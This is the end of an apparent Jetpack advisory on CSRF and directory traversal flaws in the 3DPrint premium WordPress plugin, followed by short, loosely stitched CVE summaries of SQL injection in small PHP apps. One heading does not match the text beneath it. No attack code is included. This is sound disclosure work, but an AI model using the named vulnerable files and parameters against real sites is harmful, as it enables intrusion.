The easiest way is to delete the file wp-content/plugins/3dprint/includes/ext/tinyfilemanager/tinyfilemanager.php if it exists.

**Conclusions**

All versions of the 3DPrint premium plugin are vulnerable to CSRF and directory traversal attacks if the file manager module is enabled on the site. This does not affect the free version of the plugin downloaded from the WordPress.org plugin repository.

At Jetpack, we work hard to make sure your websites are protected from these types of vulnerabilities. We recommend that you have a security plan for your site that includes malicious file scanning and backups. The Jetpack Security bundle is one great WordPress security option to ensure your site and visitors are safe. This product includes real-time malware scanning, site backups, comment and form spam protection from Akismet, brute force attack protection, and more.

****Credits****

Research by Harald Eilertsen, with feedback and corrections provided by Benedict Singer, Rob Pugh, Jen Swisher and the Jetpack Scan team.

**Timeline**

*   2022-09-08: We were made aware of the finding and started investigating
*   2022-10-25: Contacted vendor first time
*   2022-11-01: Vendor contacted second time through a different channel
*   2022-11-08: Mass delete vulnerability disclosed (CVE-2022-3899)
*   2022-11-15: Contacted developers of Tiny File Manager about lack of CSRF protection, and directory traversal vulnerabilities.
*   2022-11-19: Tiny File Manager 2.5.0 released, fixing CSRF issues but not the directory traversal problems.
*   2022-12-13: Public disclosure

This entry was posted in Vulnerabilities. Bookmark the permalink.

Harald Eilertsen

Harald is a Certified Systems Security Professional (CISSP) with a wide background from software development and the security industry. He has a Master of Science in analog microelectronics from the Norwegian University of Science and Technology (NTNU), and has worked for companies such as Norman, Tandberg and Cisco before joining the Jetpack Scan team at Automattic.

Explore the benefits of Jetpack

Learn how Jetpack can help you protect, speed up, and grow your WordPress site.

**Get up to 53% off your first year.**

Compare plans

CVE-2022-4023: Vulnerabilities Found in the 3DPrint Premium Plugin

A vulnerability classified as critical has been found in Campcodes Beauty Salon Management System 1.0. Affected is an unknown function of the file add-product.php. The manipulation of the argument category leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-234252.

CVE-2023-3695

A vulnerability, which was classified as critical, has been found in SourceCodester House Rental and Property Listing 1.0. This issue affects some unknown processing of the file index.php. The manipulation of the argument keywords/location leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-234245 was assigned to this vulnerability.

CVE-2023-3694

A vulnerability classified as critical was found in SourceCodester Life Insurance Management System 1.0. This vulnerability affects unknown code of the file login.php. The manipulation of the argument username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-234244.

Tag

#php